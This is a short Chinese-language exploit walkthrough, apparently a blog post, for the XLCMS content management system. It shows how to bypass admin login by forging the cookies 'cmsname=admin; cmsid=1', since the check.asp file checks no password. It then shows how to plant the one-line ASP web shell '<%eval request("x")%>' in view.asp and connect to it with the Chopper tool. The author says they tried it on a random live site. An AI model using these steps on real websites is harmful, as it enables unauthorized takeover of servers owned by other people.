http://www.ycxl.net/
XLCMS官网
随便拿了一个网站的后台 弱口令登陆 发现有文件管理功能
顺便看了看后台登陆的代码
包含了check.asp
再去看看check.asp
有木有发现只对cmsid 和cmsname 做了验证
我们再来看下登陆后的cookie
cmsname=admin; cmsid=1 没有password(密码)
。。。。设计这个程序的程序员,应该拖出去斩了
Cmsname= 就是管理员的用户名
Cmsid= 就是管理员的id
通常 用户名都为 admin 管理员的id 肯定是1了
如果管理员的账号不是默认的admin呢? 没关系,随便找一个新闻看作者的名称

我们现在来构造cookie
用火狐浏览器的firebug插件改一下cookie
![(7]K[]CFU@X76~%8O@~X[H3.jpg](http://wimg.zone.ci/upload/201412/091721324428f8b66233b17ea293f8ee6f3c7484.jpg)
![_2PIQ]WC@8B{D[4R9IS1WLP.jpg](http://wimg.zone.ci/upload/201412/09172247f8de5e878b8e6e7970d830c7ebdf4cec.jpg)
这时我们再访问/admin/index.asp 验证成功啊有木有
Getshell
用以下数据包提交 (把 *** 换成xlcms的网站就行)
提交后就会在网站根目录下的view.asp文件加上 一句<%eval request("x")%>
用菜刀连接http://****/view.asp 密码为“x”。
![5$}48LK])4@1NQ@K@6F0XFN.jpg](http://wimg.zone.ci/upload/201412/0917240866b1ed7058dc732fae542b3d868204ab.jpg)
